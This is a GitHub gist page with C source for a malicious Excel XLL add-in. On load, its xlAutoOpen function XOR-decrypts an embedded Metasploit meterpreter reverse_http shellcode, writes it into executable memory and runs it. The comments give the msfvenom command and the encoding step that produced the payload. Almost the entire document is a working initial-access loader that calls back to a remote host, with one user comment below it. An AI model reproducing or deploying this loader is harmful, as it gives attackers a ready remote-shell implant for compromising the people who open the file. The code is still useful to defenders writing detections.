Skip to content

Instantly share code, notes, and snippets.

@Arno0x

Arno0x/shellcode_multibyteXOR_ExcelRegisterXLL.c

Last active October 12, 2023 23:19
Show Gist options
  • Save Arno0x/f71a9db515ddea686ccdd77666bebbaa to your computer and use it in GitHub Desktop.
Save Arno0x/f71a9db515ddea686ccdd77666bebbaa to your computer and use it in GitHub Desktop.
Download ZIP
Raw
shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
unsigned char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
unsigned char key[] = "testkey";
void *exec;
// Char array to host the deciphered shellcode
unsigned char shellcode[sizeof encryptedShellcode];
// XOR decoding stub using the key defined above must be the same as the encoding key
int j = 0;
int i;
for (i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}
// Allocating memory with EXECUTE writes
exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copying deciphered shellcode into memory as a function
memcpy(exec, shellcode, sizeof shellcode);
// Call the shellcode
((void(*)())exec)();
return 1;
}
void __cdecl xlAutoOpen()
{
HANDLE threadHandle;
// Create a thread and close the handle as we do not want to use it to wait for it
threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
CloseHandle(threadHandle);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
@SparrowImports
Copy link

Shellcode encoder not working

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment